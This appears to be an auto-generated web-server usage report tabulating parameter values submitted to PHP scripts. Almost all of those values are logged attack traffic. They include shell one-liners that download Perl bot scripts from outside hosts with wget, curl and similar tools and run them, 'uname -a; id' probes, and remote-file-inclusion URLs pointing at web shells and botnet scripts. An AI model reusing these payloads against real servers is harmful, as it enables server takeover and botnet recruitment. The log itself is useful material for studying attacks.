cd /tmp;rm -rf shell;wget http://br.geocities.com/chatbr.ow nz/shell.txt;lwp-download http://br.geocities.com/chatbr.own z/shell.txt;fetch http://br.geocities.com/chatbr.ownz/shell. txt;curl -o shell.txt http://br.geocities.com/chatbr.ownz/sh ell.txt;GET http://br.geocities.com/chatbr.ownz/shell.txt >s hell.txt;lynx -source http://br.geocities.com/chatbr.ownz/sh ell.txt;perl shell.txt;rm -rf shell.txt	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
cd /tmp;rm botnet.txt;wget http://www.powerbikes.gr/forum/bo tnet.txt;fetch http://www.powerbikes.gr/forum/botnet.txt;lwp -download http://www.powerbikes.gr/forum/botnet.txt;curl -O http://www.powerbikes.gr/forum/botnet.txt;lynx http://www.po werbikes.gr/forum/botnet.txt;perl botnet.txt;rm botnet.txt	8
OTHER:	962
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
cd /tmp;id	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
cd /tmp;rm sur0.txt;wget http://71.41.190.203/sur0.txt;fetch http://71.41.190.203/sur0.txt;lwp-download http://71.41.190 .203/sur0.txt;curl -O http://71.41.190.203/sur0.txt;lynx htt p://71.41.190.203/sur0.txt;perl sur0.txt;rm -rf sur0.txt*	4
OTHER:	966
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://overowns.googlepages.com/testera.txt?	11
OTHER:	959
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;rm bn.txt;wget http://www.ownedson.110mb.com/bn.txt; fetch http://SITE/bot.txt;lwp-download http://www.ownedson.1 10mb.com/bn.txt;curl -O http://www.ownedson.110mb.com/bn.txt ;lynx http://www.ownedson.110mb.com/bn.txt;perl bn.txt	3
OTHER:	967
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.panograf.net/ircd/spread.txt?	10
http://www.atkk3.xpg.com.br/bflood.txt?	5
OTHER:	955
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter
Value	Accesses
	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://bsthank.t35.com/spread.txt?	5
http://raptortx.googlepages.com/inc3.txt??	4
http://chat.wins.com.br:8080/httd.txt?	4
http://www.superlab.jazztel.es/safe.gif?	3
http://www.freewebs.com/normancito/asdasd.txt??	3
http://netbr.org/documents/r57.txt?	3
http://64.32.13.169/ma.txt?	3
http://www.pixeldust.net/sox.txt?	3
http://h1.ripway.com/sur00t/testador.txt?	3
http://kamstorn.googlepages.com/botnet.txt?	3
OTHER:	936
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;wget http://www.pedr0.kit.net/bb.txt;fetch http://ww w.pedr0.kit.net/bb.txt;lwp-download http://www.pedr0.kit.net /bb.txt;curl -O http://www.pedr0.kit.net/bb.txt;lynx http:// www.pedr0.kit.net/bb.txt;perl bb.txt;rm -rf bb.txt	9
OTHER:	961
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://h1.ripway.com/DiegoVirus/pbot2.txt?	2
http://xsenharox.xpg.com.br/nfaehuaeh.txt?	2
http://www.freewebs.com/zcrewpacketyou/bot.txt?	2
http://no.spam.ee/~tonu/phpshell/r57shell.txt?	2
OTHER:	962
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;rm botnet.txt;wget http://nodan.110mb.com/botnet.txt ;fetch http://nodan.110mb.com/botnet.txt;lwp-download http:/ /nodan.110mb.com/botnet.txt;curl -O http://nodan.110mb.com/b otnet.txt;lynx http://nodan.110mb.com/botnet.txt;perl botnet .txt;rm botnet.txt	10
cd /var/tmp;rm botnet.txt;wget http://www.powerbikes.gr/foru m/botnet.txt;fetch http://www.powerbikes.gr/forum/botnet.txt ;lwp-download http://www.powerbikes.gr/forum/botnet.txt;curl -O http://www.powerbikes.gr/forum/botnet.txt;lynx http://ww w.powerbikes.gr/forum/botnet.txt;perl botnet.txt;rm botnet.t xt	10
uname -a; id	4
cd /tmp;rm pemlk.txt;wget http://pemlk.iespana.es/tools/peml k.txt;fetch http://pemlk.iespana.es/tools/pemlk.txt;lwp-down load http://pemlk.iespana.es/tools/pemlk.txt;curl -O http:// pemlk.iespana.es/tools/pemlk.txt;lynx http://pemlk.iespana.e s/tools/pemlk.txt;perl pemlk.txt;rm pemlk.txt?	3
cd /tmp;rm tut.txt;wget http://malware.t35.com/tut.txt;fetch http://malware.t35.com/tut.txt;lwp-download http://malware. t35.com/tut.txt;curl -O http://malware.t35.com/tut.txt;lynx http://malware.t35.com/tut.txt;perl tut.txt;rm -rf tut.txt*	2
OTHER:	941
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.ghostbuster.xpg.com.br/index2.txt??	2
OTHER:	968
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;rm botf.txt;wget http://71.41.190.203/botf.txt;fetch http://71.41.190.203/botf.txt;lwp-download http://71.41.190 .203/botf.txt;curl -O http://71.41.190.203/botf.txt;lynx htt p://71.41.190.203/botf.txt;perl botf.txt;rm -rf botf.txt*	2
cd /tmp;rm pemlk.txt;wget http://members.lycos.co.uk/enviesc raps/pemlk.txt;fetch http://members.lycos.co.uk/enviescraps/ pemlk.txt;lwp-download http://members.lycos.co.uk/enviescrap s/pemlk.txt;curl -O http://members.lycos.co.uk/enviescraps/p emlk.txt;lynx http://members.lycos.co.uk/enviescraps/pemlk.t xt;perl pemlk.txt;rm -rf pemlk*.txt	2
cd /tmp;rm tut.txt;wget http://malware.t35.com/tut.txt;fetch http://malware.t35.com/tut.txt;lwp-download http://malware. t35.com/tut.txt;curl -O http://malware.t35.com/tut.txt;lynx http://malware.t35.com/tut.txt;perl tut.txt;rm -rf tut.txt*h ttp://www2.binaryshadow.org:81/~w00t/my/tool/tool25.dat?	2
cd /tmp;rm bot123ffiii.txt;wget www.xsenharox.xpg.com.br/bot 123ffiii.txt;fetch www.xsenharox.xpg.com.br/bot123ffiii.txt; lwp-download www.xsenharox.xpg.com.br/bot123ffiii.txt;curl - O www.xsenharox.xpg.com.br/bot123ffiii.txt;lynx www.xsenharo x.xpg.com.br/bot123ffiii.txt;perl bot123ffiii.txt	2
cd /tmp;rm startindo.txt;wget http://start.helloweb.eu/botne t/startindo.txt;fetch http://start.helloweb.eu/botnet/starti ndo.txt;lwp-download http://start.helloweb.eu/botnet/startin do.txt;curl -O http://start.helloweb.eu/botnet/startindo.txt ;lynx http://start.helloweb.eu/botnet/startindo.txt;perl sta rtindo.txt;rm startindo.txt	1
cd /tmp;rm ops.txt;wget http://pemlk.iespana.es/tools/hehehe /ops.txt;fetch http://pemlk.iespana.es/tools/hehehe/ops.txt; lwp-download http://pemlk.iespana.es/tools/hehehe/ops.txt;cu rl -O http://pemlk.iespana.es/tools/hehehe/ops.txt;lynx http ://pemlk.iespana.es/tools/hehehe/ops.txt;perl ops.txt;rm ops .txt?	1
cd /tmp;rm pemlk.txt;wget http://pemlk.iespana.es/toolshttp: //pemlk.iespana.es/tools/pemlk.txt;fetch http://pemlk.iespan a.es/toolshttp://pemlk.iespana.es/tools/pemlk.txt;lwp-downlo ad http://pemlk.iespana.es/toolshttp://pemlk.iespana.es/tool s/pemlk.txt;curl -O http://pemlk.iespana.es/toolshttp://peml k.iespana.es/tools/pemlk.txt;lynx http://pemlk.iespana.es/to olshttp://pemlk.iespana.es/tools/pemlk.txt;perl pemlk.txt;rm pemlk.txt?	1
cd /tmp;wget http://projectyenor2.iespana.es/goo.txt;curl -O http://projectyenor2.iespana.es/goo.txt;fetch http://projec tyenor2.iespana.es/goo.txt;lynx http://projectyenor2.iespana .es/goo.txt;lwp-download http://projectyenor2.iespana.es/goo .txt;perl goo.txt	1
cd /tmp;rm sta.txt;wget http://189.24.221.165:9090/sta.txt;f etch http://189.24.221.165:9090/sta.txt;lwp-download http:// 189.24.221.165:9090/sta.txt;curl -O http://189.24.221.165:90 90/sta.txt;lynx http://189.24.221.165:9090/sta.txt;perl sta. txt;rm -rf sta.txt*	1
cd /tmp;rm start.txt;wget http://71.41.190.203/start.txt;fet ch http://71.41.190.203/start.txt;lwp-download http://71.41. 190.203/start.txt;curl -O http://71.41.190.203/start.txt;lyn x http://71.41.190.203/start.txt;perl start.txt;rm -rf start .txt*	1
Parameter	list
Value	Accesses
1	9
Parameter	path[docroot]
Value	Accesses
http://usuarios.arnet.com.ar/adrikrasnow/speed.txt?	25
http://www.powerbikes.gr/forum/tool25.txt?	18
	10
http://www.h4x0r-s.kit.net/tool/tool25.dat?	9
http://www.freewebs.com/yahwek/phpbot.txt?	9
http://usuarios.arnet.com.ar/larry123/ka.txt?	9
http://nartok.com/CMS/cache/traira.txt?	8
http://www.catim.com/legislacao/suntik/r57?	8
http://chatbr.sytes.net:8090/apache2-default/staffpackts/apc .txt	7
http://www.digownz.kit.net/pbot1.txt??	7
OTHER:	837
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.mejlgade.dk/bachpluskjoller/testeinbox2.txt??	2
OTHER:	968
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://www.freewebs.com/h1h1h1/p.txt??	6
http://nodan.110mb.com/tool25.txt?	6
http://members.lycos.co.uk/enviescraps/pbot.txt?	6
http://redinhu.we.bs/pbot.txt?	6
http://www.stdr.xpg.com.br/compito?	5
http://pemlk.iespana.es/tools/tool25.txt?	5
http://tibiaowns9.googlepages.com/GIKOBOTS.txt?	5
http://www.freewebs.com/playssonn/p.txt??	5
http://ganhador.eushells.org/bot.txt??	4
http://www.fuck-all.kit.net/pbot2.txt?	4
OTHER:	918
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://206.71.148.89/pbot.txt??]	6
OTHER:	964
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://www.lordxpl.xpg.com.br/own.txt?	3
OTHER:	967
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://h1.ripway.com/DiegoVirus/pbot.txt?	5
http://www.gratisweb.com/atk33/regu.txt?	4
http://chat.wins.com.br:8080/httd.txt	2
OTHER:	959
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://biancaa1990.fileave.com/script9.txt??	3
OTHER:	967
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://64.32.13.161/ma.txt	3
OTHER:	967
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://www.freewebs.com/scanspread/bozo.txt?	3
OTHER:	967
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.ligseg.com.br/id.gif?	2
http://joaobenner.fileave.com/script9.txt??	2
OTHER:	966
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;rm -rf tut;wget http://inimigo.t35.com/tut.txt;lwp- download http://inimigo.t35.com/tut.txt;fetch http://inimigo .t35.com/tut.txt;curl -o tut.txt http://inimigo.t35.com/tut. txt;GET http://inimigo.t35.com/tut.txt >tut.txt;lynx -source http://inimigo.t35.com/tut.txt >tut.txt;perl tut.txt;rm -rf tut.txt	3
OTHER:	967
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.flyafac.com/images/kua.txt?	2
http://puxo.ifrance.com/57.??	2
http://baixinho.we.bs/cmdimbox.txt?	1
http://www.ligseg.com.br/Etc/24.gif?http://www.ligseg.com.br /Etc/24.gif?	1
http://www.ilegais.xpg.com.br/bd??????	1
http://www.freewebs.com/xlip3/bot.txt?	1
http://www.freewebs.com/normancito/bota.txt??	1
http://usuarios.arnet.com.ar/larry123/http.txt?	1
http://www.stdr.xpg.com.br/1?	1
OTHER:	959
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;rm botnet.txt;wget http://noden.110mb.com/botnet.txt ;fetch http://noden.110mb.com/botnet.txt;lwp-download http:/ /noden.110mb.com/botnet.txt;curl -O http://noden.110mb.com/b otnet.txt;lynx http://noden.110mb.com/botnet.txt;perl botnet .txt;rm botnet.txt	10
OTHER:	960
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://baixinho.50webs.com/x0.txt?	1
http://spam.219.googlepages.com/pbot.txt?	1
http://freewebs.com/0m4rc170/asd.txt?	1
http://www.atkk3.xpg.com.br/botlogin.txt?	1
http://snock.110mb.com/spread.txt??/par	1
http://www.r57.li/r57.txt?	1
http://www.docsite.ru/cache/injektion.txt?	1
http://142.176.17.11/y.txt?	1
OTHER:	962
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;rm sta.txt;wget http://189.24.221.165:9090/sta.txt;f etch http://189.24.221.165:9090/sta.txt;lwp-download http:// 189.24.221.165:9090/sta.txt;curl -O http://189.24.221.165:90 90/sta.txt;lynx http://189.24.221.165:9090/sta.txt;perl sta. txt;rm sta.txt	5
OTHER:	965
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://xsenhalol.xpg.com.br/subja?	1
http://www.cfr.cl/mail/bot.txt??	1
http://river.hostinggratisargentina.com/http?	1
http://www.atkk3.xpg.com.br/rave.jpg?	1
http://claroline.lct-net.cl/id?	1
OTHER:	965
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;rm start.txt;wget http://189.24.138.40/start.txt;fet ch http://189.24.138.40/start.txt;lwp-download http://189.24 .138.40/start.txt;curl -O http://189.24.138.40/start.txt;lyn x http://189.24.138.40/start.txt;perl start.txt;rm start.txt	3
OTHER:	967
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.xsenharox.xpg.com.br/e_sempre_nois.txt?	1
http://64.32.13.169/ma.txt?http://64.32.13.169/ma.txt?http:/ /64.32.13.169/ma.txt?http://64.32.13.169/ma.txt?	1
http://www.analisenet.com.br/controle/newspublish/id.txt?	1
OTHER:	967
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;rm start.txt;wget http://189.24.38.250:8090/start.tx t;fetch http://189.24.38.250:8090/start.txt;lwp-download htt p://189.24.38.250:8090/start.txt;curl -O http://189.24.38.25 0:8090/start.txt;lynx http://189.24.38.250:8090/start.txt;pe rl start.txt;rm start.txt	3
OTHER:	967
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://snock.110mb.com/teste.txt?	1
http://d1459929.u68.igempresas.ig.com.br/rave.txt?	1
OTHER:	968
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;rm subale.txt;wget http://71.41.190.203/subale.txt;f etch http://71.41.190.203/subale.txt;lwp-download http://71. 41.190.203/subale.txt;curl -O http://71.41.190.203/subale.tx t;lynx http://71.41.190.203/subale.txt;perl subale.txt;rm -r f *.txt	2
cd /tmp;rm bnet.txt;wget http://noden.110mb.com/bnet.txt;fet ch http://noden.110mb.com/bnet.txt;lwp-download http://noden .110mb.com/bnet.txt;curl -O http://noden.110mb.com/bnet.txt; lynx http://noden.110mb.com/bnet.txt;perl bnet.txt;rm bnet.t xt	2
cd /tmp;rm s1t2a3r4t.txt;wget http://189.24.167.23:9090/s1t2 a3r4t.txt;fetch http://189.24.167.23:9090/s1t2a3r4t.txt;lwp- download http://189.24.167.23:9090/s1t2a3r4t.txt;curl -O htt p://189.24.167.23:9090/s1t2a3r4t.txt;lynx http://189.24.167. 23:9090/s1t2a3r4t.txt;perl s1t2a3r4t.txt;rm s1t2a3r4t.txt	2
OTHER:	964
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://chat.wins.com.br/httd.txt?http://chat.wins.com.br:808 0/httd.txt	1
http://www.rapimusica.com/morgan.txt??	1
http://www.freewebs.com/haddem/botnetphp.txt	1
OTHER:	967
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;rm start.txt;wget http://189.24.48.179:8090/start.tx t;fetch http://189.24.48.179:8090/start.txt;lwp-download htt p://189.24.48.179:8090/start.txt;curl -O http://189.24.48.17 9:8090/start.txt;lynx http://189.24.48.179:8090/start.txt;pe rl start.txt;rm start.txt	1
cd /tmp;rm sub.txt;wget http://71.41.190.203/sub.txt;fetch h ttp://71.41.190.203/sub.txt;lwp-download http://71.41.190.20 3/sub.txt;curl -O http://71.41.190.203/sub.txt;lynx http://7 1.41.190.203/sub.txt;perl sub.txt;rm -rf *.txt	1
cd /tmp;rm pemlk.txt;wget http://189.24.81.113:8080/pemlk.tx t;fetch http://189.24.81.113:8080/pemlk.txt;lwp-download htt p://189.24.81.113:8080/pemlk.txt;curl -O http://189.24.81.11 3:8080/pemlk.txt;lynx http://189.24.81.113:8080/pemlk.txt;pe rl pemlk.txt;rm pemlk.txt?	1
OTHER:	967
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.ilegais.xpg.com.br/spread.txt??	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;killall -9 perl;wget http://projectyenor2.iespana.es /kkk.txt;curl -O http://projectyenor2.iespana.es/kkk.txt;fet ch http://projectyenor2.iespana.es/kkk.txt;lynx http://proje ctyenor2.iespana.es/kkk.txt;lwp-download http://projectyenor 2.iespana.es/kkk.txt;perl kkk.txt??	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://snock.110mb.com/spread.txt???http://snock.110mb.com/s pread.txt???http://snock.110mb.com/spread.txt???http://snock .110mb.com/spread.txt???http://snock.110mb.com/spread.txt???	1
http://www.thebrn.kit.net/pbot.txt?	1
OTHER:	968
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;rm start.txt;wget http://189.24.138.40/start.txt;fet ch http://189.24.138.40/start.txt;lwp-download http://189.24 .138.40/start.txt;curl -O http://189.24.138.40/start.txt;lyn x http://189.24.138.40/start.txt;perl start.txt;rm -rf *.txt	1
cd /tmp;rm bucetuda.txt;wget http://www.zjkjw.gov.cn/bucetud a.txt;fetch http://www.zjkjw.gov.cn/bucetuda.txt;lwp-downloa d http://www.zjkjw.gov.cn/bucetuda.txt;curl -O http://www.zj kjw.gov.cn/bucetuda.txt;lynx http://www.zjkjw.gov.cn/bucetud a.txt;perl bucetuda.txt;rm -rf *.txt	1
OTHER:	968
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://om-autoteile.eu/http.txt??	1
http://snock.110mb.com/spread.txt??	1
OTHER:	968
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;rm start.txt;wget http://189.24.38.227/start.txt;fet ch http://189.24.38.227/start.txt;lwp-download http://189.24 .38.227/start.txt;curl -O http://189.24.38.227/start.txt;lyn x http://189.24.38.227/start.txt;perl start.txt;rm start.txt	2
cd /tmp;rm start.txt;wget http://189.24.201.140/start.txt;fe tch http://189.24.201.140/start.txt;lwp-download http://189. 24.201.140/start.txt;curl -O http://189.24.201.140/start.txt ;lynx http://189.24.201.140/start.txt;perl start.txt;rm star t.txt	1
cd /tmp;rm sta.txt;wget http://start.helloweb.eu/botnet/sta. txt;fetch http://start.helloweb.eu/botnet/sta.txt;lwp-downlo ad http://start.helloweb.eu/botnet/sta.txt;curl -O http://st art.helloweb.eu/botnet/sta.txt;lynx http://start.helloweb.eu /botnet/sta.txt;perl sta.txt;rm sta.txt	1
cd /tmp;wget http://vsffdp.iespana.es/1.txt;curl -O http://v sffdp.iespana.es/1.txt;fetch http://vsffdp.iespana.es/1.txt; lynx http://vsffdp.iespana.es/1.txt;lwp-download http://vsff dp.iespana.es/1.txt;perl 1.txt	1
cd /tmp;wget http://projectyenor2.iespana.es/file234.txt;cur l -O http://projectyenor2.iespana.es/file234.txt;fetch http: //projectyenor2.iespana.es/file234.txt;lynx http://projectye nor2.iespana.es/file234.txt;lwp-download http://projectyenor 2.iespana.es/file234.txt;perl file234.txt??	1
Parameter	path[docroot]
Value	Accesses
http://www2.binaryshadow.org:81/~w00t/my/tool/tool25.dat?	21
http://ownsirc.googlepages.com/botnet.txt?	13
http://noden.110mb.com/tool25.txt?	12
http://h1.ripway.com/DiegoVirus/pbot.txt?	11
http://gavindegraw.onthestreets.net/flyer/hehe.txt?	10
http://www.rj2008.kit.net/p.txt??	7
http://www.rj2009.kit.net/ddd.txt?	6
http://www.freewebs.com/b0mb4do1337/p.txt??	6
http://h1.ripway.com/brunoz/botnetpriv8.txt?	5
http://www3.bloglog.com.br/p.t?	5
OTHER:	868
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.cfr.cl/mail/bot.txt???	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://bsthank.t35.com/spread.txt?	4
OTHER:	966
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://vulnerable.we.bs/files/xroot-bnet.txt?	1
http://h1.ripway.com/sur00t/testador.txt?/par	1
OTHER:	968
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;rm sta.txt;wget http://189.24.36.96:9090/sta.txt;fet ch http://189.24.36.96:9090/sta.txt;lwp-download http://189. 24.36.96:9090/sta.txt;curl -O http://189.24.36.96:9090/sta.t xt;lynx http://189.24.36.96:9090/sta.txt;perl sta.txt;rm sta .txt?	1
cd /tmp;rm start.txt;wget start.helloweb.eu/botnet/start.txt ;fetch start.helloweb.eu/botnet/start.txt;lwp-download start .helloweb.eu/botnet/start.txt;curl -O start.helloweb.eu/botn et/start.txt;lynx start.helloweb.eu/botnet/start.txt;perl st art.txt;rm start.txt?	1
OTHER:	968
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://fagner.crewhosting.com/own.txt??	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;rm start.txt;wget http://189.24.48.179:8090/start.tx t;fetch http://189.24.48.179:8090/start.txt;lwp-download htt p://189.24.48.179:8090/start.txt;curl -O http://189.24.48.17 9:8090/start.txt;lynx http://189.24.48.179:8090/start.txt;pe rl start.txt;rm start.txt?	1
cd /tmp;wget http://h1.ripway.com/marley/tut.txt;perl tut.tx t;rm tut.txt	1
cd /tmp;rm start.txt;wget http://189.24.167.23:9090/start.tx t;fetch http://189.24.167.23:9090/start.txt;lwp-download htt p://189.24.167.23:9090/start.txt;curl -O http://189.24.167.2 3:9090/start.txt;lynx http://189.24.167.23:9090/start.txt;pe rl start.txt;rm start.txt	1
Parameter	path[docroot]
Value	Accesses
http://www.neoncomanda.kit.net/tool25.dat?	14
http://www.vsm.gov.tr/gorselbasin/docs/gorselbasin/aw128.txt ?	10
http://www.oslutadores.com/?id=23530	8
http://h1.ripway.com/rootz/tut.txt?	6
http://www.freewebs.com/t420/p.txt??	6
http://nodan.110mb.com/hehe.txt?	6
http://qlzrox.iespana.es/sb4?	5
http://bsthank.t35.com/mundoirc.txt?	5
OTHER:	907
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://216.222.194.67/bitch.txt???	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://www.txd.conexaostore.com/tester?	4
http://bsthank.t35.com/Phpbots/wpK.txt?	4
http://mensagenss.hospedagemdesite.com/tool25/tool25.dat?	4
http://www.freewebs.com/yahwek/phpbot2.txt?	4
http://flaw.we.bs/a.txt?	4
http://www.jungo8949.co.kr/tool25.txt?	4
http://scanbx.iespana.es/bitch.txt??	3
http://3sk3nt.kit.net/p.txt?	3
OTHER:	940
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.vsm.gov.tr/red.txt??	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://www.santiagoonline.com.ar/readme.txt?	3
http://seideiaslegais.googlepages.com/own.txt??	3
OTHER:	964
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://210.246.145.70:32000/bitch.txt???	1
http://www.ligseg.com.br/Etc/24.gif?	1
http://yahwek.dll.googlepages.com/phpbot.txt?	1
http://www.gratisweb.com/tomcruise2005/tester.txt?	1
http://www.mateus.t5.com.br/pbotmTs.txt?	1
OTHER:	965
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
